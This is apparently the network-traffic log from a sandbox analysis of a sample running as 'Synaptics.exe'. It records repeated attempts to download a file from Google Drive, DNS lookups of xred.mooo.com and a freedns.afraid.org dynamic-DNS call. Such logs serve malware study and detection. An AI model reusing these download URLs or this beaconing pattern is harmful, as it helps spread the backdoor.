                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4LBabmw4sT-JCsvcoTPhNiO-1m02otZQQGE9xdHg-6PLurMKidHJjFnAIPmCwAqxajN8Dxo38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:38 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wWgwTKH6t-2j3wTNXqfVig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5njZ0O6RLPwF0SWoclJGltMA9ZUvaKO9CShYeHIG0Xeh_WonXKwrxn_sDDzpsAiuRVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x7i3v9nP3K3FdGS-VjK1gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gstVG9ouQspWNOvWXlWMKIOc_4q-zauMGlryv7fSQO1QkjRcCjsIiBB08XSid9f5pContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-TOnM3njbDoZvr9dpqpqA4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6FmOF4nQB1QFLxUKowGzw4M578Y53Gpgwcr-5qXO50kj3yg2E8KDIu2MBUV4GIPlfRnw708PYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:43 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-B1C1s3xvcKgqplh3l5kGEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6yuRk96Asy0M-_vUlLbrGGPx_bf5wMgLT1317HoWvzNYudNOpzdPLyowWj1bMZzobcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-fJQwG76P72Cf8HTF18hkRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC58GSHqt-Htrb-a5D6tAo-fhb8HmgGAS5EveCdfiDCsgm3oShiyBaRLe8zfKgixWfxKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:44 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vd6-Qw0tB3IIU80raDPXmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ygYu82zC6obV2S2DYWnux_uAmtqMldNyUUubAJgmQ5J715FfIc2a2f3FbVjv2EKgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Be2qfYJvuWOeXiKZwBzKzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7pq1dpBb_fa2D5EzVrDu9ZveZfW3d9tPeBedSfsnqUB99CAj65tplMkp56UW6l0dSpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:46 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-T99BGiUP7RhfuJ2hfh_iHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mxnI5ydwAYFyere2_4MlGs8Wqb9AOQZs4BJasRe8jFiqmKw38uEoUi6ilvhBZev6OContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:47 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bKALfDcY-nvlGkO6-JPvlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6s4gOR73lQMY2UndEO6c0xQrqXONE8Lc_0F69l_x-_MO_Wc5iRYxGwA9J1pm7Of8gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:48 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Hx8qXg4mYyKF8vjSsz-mFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4q_i4R9iAPd08uD7c-QZdb6UPJ_76hEqZvuyPyUYc9CmgPSxcxVoF8fp-0jocGfYsodmDvzJMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:51 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-G1EYSmQaVnCZ7We_xeb5tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45BK2ZiVCOJTylNCxCU5AqHYXXxu4ssPFjnSNcUIAWSMkmAh3wtStSCJ3paGj3WVVEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:51 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-ZbGoI6AkfDWf08z7tsCxsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46gvwpuLWds7h9u7lZ6o86Z4IMGuFfONnNlzF2URs8PiH-leQ5UmpaM2JXAX5tXeJGwTUOh0IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:52 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-BdrCW2XPztuyzis3Ef23rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7J-nxq6HqfLMYQwZ_QoJWWVk4MszAoPGD8_BrDFzzOuK4UTJB3md9PQtqgnzvKHwsw_2ha0vsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:52 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-N3xFILOYhZaGphVIq2ge3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC68IMqGZPP_J7AFqIJnOfTnvCm4yWsBvlpkpN-yJPBGL8xfigLlcwt9NDbh_xiHc7aIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:54 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8NyWU9oTUVYrSyKfg1ZMLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7sfKN0H37Su_9SJUFc-2GXhrwQoYbAj0saupF9Ob5GAqecY77dKUsfJ0j4uOeIaqDSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-etMRvFvIMZcD9ZcYk71Skg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4bJT-AK1xgGw6CXIPxi7ORxN_wPPXBsmFov6Lh2T1bW8dBHsg5gOhq56EmJ0BwNpZSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-cFJ0x-YPeC1h8s5nXPZLmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
